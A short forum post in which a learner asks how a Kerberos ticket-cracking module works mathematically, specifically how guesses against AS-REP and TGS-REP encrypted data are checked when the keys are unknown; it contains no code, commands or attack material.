How krb5tgs actually works? (Mathematically)
Hey, I am learning about kerberos.

I know that krb5tgs module can try to crack kerberos AS-REP clienk-kdc session key encrypted with the user NT hash, and it can try to crack kerberos TGS-REP service ticket encrypted with the service account NT hash.

What I am curious about is what logic is made to crack this values.
If in the AS-REP the generated client-kdc session key is unknown and it is encrypted with the user's NT hash which is also unknown then how is it crackable? what kind of comparison is made?

Hey, in case someone knows, I am still looking for that answer. Thanks